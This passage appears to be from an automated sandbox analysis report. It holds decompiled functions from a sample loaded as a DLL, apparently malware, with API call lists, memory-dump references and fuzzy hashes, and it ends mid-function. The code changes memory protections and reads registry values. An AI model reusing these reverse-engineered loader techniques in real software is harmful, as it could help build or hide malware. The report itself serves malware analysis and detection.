                                                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                                                    			E0040111A(void* __ecx, char _a4) {
                                                                                                                                                                                                                                    				long _t3;
                                                                                                                                                                                                                                    				int _t4;
                                                                                                                                                                                                                                    				int _t9;
                                                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t13 = GetCurrentThread();
                                                                                                                                                                                                                                    				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                                                                                                                                                                                                                                    				if(_t3 != 0) {
                                                                                                                                                                                                                                    					SetThreadPriority(_t13, 0xffffffff); // executed
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t4 = E0040163F(_a4); // executed
                                                                                                                                                                                                                                    				_t9 = _t4;
                                                                                                                                                                                                                                    				if(_t9 == 0) {
                                                                                                                                                                                                                                    					SetThreadPriority(_t13, _t4);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                    				return _t9;
                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040111D
                                                                                                                                                                                                                                    • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 00401128
                                                                                                                                                                                                                                    • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 0040113B
                                                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 0040114E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.512935351.0000000000405000.00000040.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Thread$Priority$AffinityCurrentMask
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1452675757-0
                                                                                                                                                                                                                                    • Opcode ID: da6ec90e5bd888973ef2fd07813b313d2e66a90270c4e140ed5d1ad6d5d64011
                                                                                                                                                                                                                                    • Instruction ID: 67fa18b92f8a63c61967de09933370e0a35cc4576ff87cf796d34e9f8e5d67a8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da6ec90e5bd888973ef2fd07813b313d2e66a90270c4e140ed5d1ad6d5d64011
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01E092712062106BE3117B295C85E6B6B5CDF95331B014236F620F62F0CB798D0286AD
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E02F973FD(void* __edx) {
                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                    				int _v12;
                                                                                                                                                                                                                                    				WCHAR* _v16;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                    				intOrPtr _t24;
                                                                                                                                                                                                                                    				void* _t26;
                                                                                                                                                                                                                                    				intOrPtr _t32;
                                                                                                                                                                                                                                    				intOrPtr _t35;
                                                                                                                                                                                                                                    				intOrPtr _t38;
                                                                                                                                                                                                                                    				intOrPtr _t42;
                                                                                                                                                                                                                                    				void* _t45;
                                                                                                                                                                                                                                    				void* _t50;
                                                                                                                                                                                                                                    				void* _t55;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t50 = __edx;
                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                    				_t23 = E02F9A72D(0,  &_v8); // executed
                                                                                                                                                                                                                                    				if(_t23 != 0) {
                                                                                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t24 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    				_t4 = _t24 + 0x2f9ede0; // 0x33e9388
                                                                                                                                                                                                                                    				_t5 = _t24 + 0x2f9ed88; // 0x4f0053
                                                                                                                                                                                                                                    				_t26 = E02F91262( &_v16, _v8, _t5, _t4); // executed
                                                                                                                                                                                                                                    				_t45 = _t26;
                                                                                                                                                                                                                                    				if(_t45 == 0) {
                                                                                                                                                                                                                                    					StrToIntExW(_v16, 0,  &_v12);
                                                                                                                                                                                                                                    					_t45 = 8;
                                                                                                                                                                                                                                    					if(_v12 < _t45) {
                                                                                                                                                                                                                                    						_t45 = 1;
                                                                                                                                                                                                                                    						__eflags = 1;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t32 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    						_t11 = _t32 + 0x2f9edd4; // 0x33e937c
                                                                                                                                                                                                                                    						_t48 = _t11;
                                                                                                                                                                                                                                    						_t12 = _t32 + 0x2f9ed88; // 0x4f0053
                                                                                                                                                                                                                                    						_t55 = E02F97CB8(_t11, _t12, _t11);
                                                                                                                                                                                                                                    						_t59 = _t55;
                                                                                                                                                                                                                                    						if(_t55 != 0) {
                                                                                                                                                                                                                                    							_t35 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    							_t13 = _t35 + 0x2f9ee1e; // 0x30314549
                                                                                                                                                                                                                                    							if(E02F989D6(_t48, _t50, _t59, _v8, _t55, _t13, 0x14) == 0) {
                                                                                                                                                                                                                                    								_t61 =  *0x2f9d25c - 6;
                                                                                                                                                                                                                                    								if( *0x2f9d25c <= 6) {
                                                                                                                                                                                                                                    									_t42 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    									_t15 = _t42 + 0x2f9ec2a; // 0x52384549
                                                                                                                                                                                                                                    									E02F989D6(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t38 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    							_t17 = _t38 + 0x2f9ee18; // 0x33e93c0
                                                                                                                                                                                                                                    							_t18 = _t38 + 0x2f9edf0; // 0x680043
                                                                                                                                                                                                                                    							_t45 = E02F92659(_v8, 0x80000001, _t55, _t18, _t17);
                                                                                                                                                                                                                                    							HeapFree( *0x2f9d238, 0, _t55);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					HeapFree( *0x2f9d238, 0, _v16);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t54 = _v8;
                                                                                                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                                                                                                    					E02F91F99(_t54);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t45;
                                                                                                                                                                                                                                    			}

















                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,033E9388,00000000,?,76D7F710,00000000,76D7F730), ref: 02F9744C
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,033E93C0,?,00000000,30314549,00000014,004F0053,033E937C), ref: 02F974E9
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02F96814), ref: 02F974FB
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                                                                                                    • Opcode ID: be24c4049c9e2d41b4968574ccd6f367dd29d7c27c945123a833094b987c8f81
                                                                                                                                                                                                                                    • Instruction ID: d80e71b743771d9ea16ea7e99a003df0cf5a1ee4d0665a6de1c3afa518f4aef8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be24c4049c9e2d41b4968574ccd6f367dd29d7c27c945123a833094b987c8f81
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C43192B1D0020CFFEF21EBA5DD48E9ABBADEB457C4F150066B605A7121D370AA14DF60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 54%
                                                                                                                                                                                                                                    			E02F98504(void* __ecx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				intOrPtr _t18;
                                                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                                                    				intOrPtr _t42;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t32 = __ecx;
                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                    				_t42 =  *0x2f9d340; // 0x33e8d39
                                                                                                                                                                                                                                    				_push(0x800);
                                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                                    				_push( *0x2f9d238);
                                                                                                                                                                                                                                    				if( *0x2f9d24c >= 5) {
                                                                                                                                                                                                                                    					if(RtlAllocateHeap() == 0) {
                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                    						_t30 = 8;
                                                                                                                                                                                                                                    						L7:
                                                                                                                                                                                                                                    						if(_t30 != 0) {
                                                                                                                                                                                                                                    							L10:
                                                                                                                                                                                                                                    							 *0x2f9d24c =  *0x2f9d24c + 1;
                                                                                                                                                                                                                                    							L11:
                                                                                                                                                                                                                                    							return _t30;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t44 = _a4;
                                                                                                                                                                                                                                    						_t40 = _v8;
                                                                                                                                                                                                                                    						 *_a16 = _a4;
                                                                                                                                                                                                                                    						 *_a20 = E02F92496(_t44, _t40); // executed
                                                                                                                                                                                                                                    						_t18 = E02F9A66E(_t37, _t40, _t44); // executed
                                                                                                                                                                                                                                    						if(_t18 != 0) {
                                                                                                                                                                                                                                    							 *_a8 = _t40;
                                                                                                                                                                                                                                    							 *_a12 = _t18;
                                                                                                                                                                                                                                    							if( *0x2f9d24c < 5) {
                                                                                                                                                                                                                                    								 *0x2f9d24c =  *0x2f9d24c & 0x00000000;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							goto L11;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t30 = 0xbf;
                                                                                                                                                                                                                                    						E02F9A1B0();
                                                                                                                                                                                                                                    						RtlFreeHeap( *0x2f9d238, 0, _t40); // executed
                                                                                                                                                                                                                                    						goto L10;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t24 = E02F9A279(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t13);
                                                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                                                    					_t30 = _t24;
                                                                                                                                                                                                                                    					goto L7;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(RtlAllocateHeap() == 0) {
                                                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t24 = E02F98B94(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t25); // executed
                                                                                                                                                                                                                                    				goto L5;
                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000800,76D7F710), ref: 02F98528
                                                                                                                                                                                                                                      • Part of subcall function 02F98B94: GetTickCount.KERNEL32 ref: 02F98BA8
                                                                                                                                                                                                                                      • Part of subcall function 02F98B94: wsprintfA.USER32 ref: 02F98BF8
                                                                                                                                                                                                                                      • Part of subcall function 02F98B94: wsprintfA.USER32 ref: 02F98C15
                                                                                                                                                                                                                                      • Part of subcall function 02F98B94: wsprintfA.USER32 ref: 02F98C41
                                                                                                                                                                                                                                      • Part of subcall function 02F98B94: HeapFree.KERNEL32(00000000,?), ref: 02F98C53
                                                                                                                                                                                                                                      • Part of subcall function 02F98B94: wsprintfA.USER32 ref: 02F98C74
                                                                                                                                                                                                                                      • Part of subcall function 02F98B94: HeapFree.KERNEL32(00000000,?), ref: 02F98C84
                                                                                                                                                                                                                                      • Part of subcall function 02F98B94: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02F98CB2
                                                                                                                                                                                                                                      • Part of subcall function 02F98B94: GetTickCount.KERNEL32 ref: 02F98CC3
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000800,76D7F710), ref: 02F98546
                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000002,02F9685F,?,02F9685F,00000002,?,?,02F92417,?), ref: 02F985A3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1676223858-0
                                                                                                                                                                                                                                    • Opcode ID: fb2eb30dcb104ce9b655f59bfcd00222c12f4cd695b22f939625a855e2b862da
                                                                                                                                                                                                                                    • Instruction ID: e191556fc94ac350fd8d8e3f583b2788e918a9eae884456540a8cea9934b3e34
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fb2eb30dcb104ce9b655f59bfcd00222c12f4cd695b22f939625a855e2b862da
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE216D76A40208EBEF019F55DC80E9A77ADEB8A7D4F100426FA01DB250DB70E954CFA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                                                    			E00401179(void* __eax, void* _a4) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                    				long _v20;
                                                                                                                                                                                                                                    				int _t43;
                                                                                                                                                                                                                                    				long _t54;
                                                                                                                                                                                                                                    				signed int _t57;
                                                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                                                    				signed int _t60;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                    				_t57 =  *0x40414c;
                                                                                                                                                                                                                                    				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                                                                                                                                                                                                                                    				_v16 =  *(__eax + 6) & 0x0000ffff;
                                                                                                                                                                                                                                    				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
                                                                                                                                                                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                    				if(_v16 <= 0) {
                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                    					return _v12;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					goto L1;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                                    					_t60 = _v12;
                                                                                                                                                                                                                                    					if(_t60 != 0) {
                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					asm("bt [esi+0x24], eax");
                                                                                                                                                                                                                                    					if(_t60 >= 0) {
                                                                                                                                                                                                                                    						asm("bt [esi+0x24], eax");
                                                                                                                                                                                                                                    						if(__eflags >= 0) {
                                                                                                                                                                                                                                    							L8:
                                                                                                                                                                                                                                    							_t54 = _t57 - 0x63699bbf;
                                                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                                                    							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
                                                                                                                                                                                                                                    							if(_t43 == 0) {
                                                                                                                                                                                                                                    								_v12 = GetLastError();
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_v8 = _v8 + 1;
                                                                                                                                                                                                                                    							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
                                                                                                                                                                                                                                    							if(_v8 < _v16) {
                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								goto L12;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						asm("bt [esi+0x24], eax");
                                                                                                                                                                                                                                    						_t54 = _t57 - 0x63699bc1;
                                                                                                                                                                                                                                    						if(__eflags >= 0) {
                                                                                                                                                                                                                                    							goto L9;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						goto L8;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					asm("bt [esi+0x24], eax");
                                                                                                                                                                                                                                    					if(_t60 >= 0) {
                                                                                                                                                                                                                                    						_t54 = _t57 - 0x63699ba3;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t54 = _t57 - 0x63699b83;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				goto L12;
                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                    0x004011e4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004011e2
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 004011B2
                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 00401227
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040122D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.512935351.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ProtectVirtual$ErrorLast
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1469625949-0
                                                                                                                                                                                                                                    • Opcode ID: 8bb0aca2ff9882565cae59be436ace9633660c54e8d7f472d76362242ea637b4
                                                                                                                                                                                                                                    • Instruction ID: e0497764a4c06b5612b956a562527d162aa7cc70331ed511b9c3235716ceee51
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8bb0aca2ff9882565cae59be436ace9633660c54e8d7f472d76362242ea637b4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 21217131801206EFCB14DF95C985AAAF7F5FF58319F0048AED102B7594E37CA695CB98
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                                                                                                                    			E02F93DD9(void* __eflags, int _a4) {
                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                    				WCHAR* _v16;
                                                                                                                                                                                                                                    				char* _v20;
                                                                                                                                                                                                                                    				int _v24;
                                                                                                                                                                                                                                    				void* _v36;
                                                                                                                                                                                                                                    				char _v40;
                                                                                                                                                                                                                                    				char _v68;
                                                                                                                                                                                                                                    				char _v72;
                                                                                                                                                                                                                                    				char _v76;
                                                                                                                                                                                                                                    				char _v80;
                                                                                                                                                                                                                                    				void _v84;
                                                                                                                                                                                                                                    				char _v88;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				intOrPtr _t40;
                                                                                                                                                                                                                                    				int _t45;
                                                                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                                                                    				intOrPtr _t52;
                                                                                                                                                                                                                                    				void* _t55;
                                                                                                                                                                                                                                    				intOrPtr _t67;
                                                                                                                                                                                                                                    				void* _t70;
                                                                                                                                                                                                                                    				void* _t80;
                                                                                                                                                                                                                                    				WCHAR* _t85;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_v88 = 0;
                                                                                                                                                                                                                                    				memset( &_v84, 0, 0x2c);
                                                                                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				_t40 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    				_t5 = _t40 + 0x2f9ee40; // 0x410025
                                                                                                                                                                                                                                    				_t85 = E02F96A12(_t5);
                                                                                                                                                                                                                                    				_v16 = _t85;
                                                                                                                                                                                                                                    				if(_t85 == 0) {
                                                                                                                                                                                                                                    					_t80 = 8;
                                                                                                                                                                                                                                    					L24:
                                                                                                                                                                                                                                    					return _t80;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t45 = StrCmpNIW(_t85, _a4, lstrlenW(_t85)); // executed
                                                                                                                                                                                                                                    				if(_t45 != 0) {
                                                                                                                                                                                                                                    					_t80 = 1;
                                                                                                                                                                                                                                    					L22:
                                                                                                                                                                                                                                    					E02F99039(_v16);
                                                                                                                                                                                                                                    					goto L24;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(E02F9A72D(0,  &_a4) != 0) {
                                                                                                                                                                                                                                    					_a4 = 0;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t50 = E02F9809F(0,  *0x2f9d33c);
                                                                                                                                                                                                                                    				_v12 = _t50;
                                                                                                                                                                                                                                    				if(_t50 == 0) {
                                                                                                                                                                                                                                    					_t80 = 8;
                                                                                                                                                                                                                                    					goto L19;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t52 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    					_t11 = _t52 + 0x2f9e81a; // 0x65696c43
                                                                                                                                                                                                                                    					_t55 = E02F9809F(0, _t11);
                                                                                                                                                                                                                                    					_t87 = _t55;
                                                                                                                                                                                                                                    					if(_t55 == 0) {
                                                                                                                                                                                                                                    						_t80 = 8;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t80 = E02F96BFA(_a4, 0x80000001, _v12, _t87,  &_v88,  &_v84);
                                                                                                                                                                                                                                    						E02F99039(_t87);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_t80 != 0) {
                                                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                                                    						E02F99039(_v12);
                                                                                                                                                                                                                                    						L19:
                                                                                                                                                                                                                                    						_t86 = _a4;
                                                                                                                                                                                                                                    						if(_a4 != 0) {
                                                                                                                                                                                                                                    							E02F91F99(_t86);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						if(( *0x2f9d260 & 0x00000001) == 0) {
                                                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                                                    							E02F98F83(_t80, _v88, _v84,  *0x2f9d270, 0);
                                                                                                                                                                                                                                    							_t80 = E02F91C74(_v88,  &_v80,  &_v76, 0);
                                                                                                                                                                                                                                    							if(_t80 == 0) {
                                                                                                                                                                                                                                    								_v24 = _a4;
                                                                                                                                                                                                                                    								_v20 =  &_v88;
                                                                                                                                                                                                                                    								_t80 = E02F942EA( &_v40, 0);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							E02F99039(_v88);
                                                                                                                                                                                                                                    							goto L17;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t67 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    						_t18 = _t67 + 0x2f9e823; // 0x65696c43
                                                                                                                                                                                                                                    						_t70 = E02F9809F(0, _t18);
                                                                                                                                                                                                                                    						_t89 = _t70;
                                                                                                                                                                                                                                    						if(_t70 == 0) {
                                                                                                                                                                                                                                    							_t80 = 8;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t80 = E02F96BFA(_a4, 0x80000001, _v12, _t89,  &_v72,  &_v68);
                                                                                                                                                                                                                                    							E02F99039(_t89);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						if(_t80 != 0) {
                                                                                                                                                                                                                                    							goto L17;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}



























                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.NTDLL ref: 02F93DEE
                                                                                                                                                                                                                                      • Part of subcall function 02F96A12: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,02F93E14,00410025,00000005,?,00000000), ref: 02F96A23
                                                                                                                                                                                                                                      • Part of subcall function 02F96A12: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 02F96A40
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 02F93E22
                                                                                                                                                                                                                                    • StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 02F93E2D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: EnvironmentExpandStrings$lstrlenmemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3817122888-0
                                                                                                                                                                                                                                    • Opcode ID: 8e5b32264900f00441589d188e4d2fdbb06a25a0fa2f89d33c9589cef0c3c242
                                                                                                                                                                                                                                    • Instruction ID: 8442e22571d97997f595fb67d0f412a12c223f3e569d054f55dacb4bba281565
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e5b32264900f00441589d188e4d2fdbb06a25a0fa2f89d33c9589cef0c3c242
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9414E72E0121CABEF11EFE4CC84EEEBBBDAF087C4B114566E605E7110D7719A488B90
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                                    			E02F99152(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				intOrPtr* _t35;
                                                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                                                    				intOrPtr* _t41;
                                                                                                                                                                                                                                    				intOrPtr* _t43;
                                                                                                                                                                                                                                    				intOrPtr* _t45;
                                                                                                                                                                                                                                    				intOrPtr* _t50;
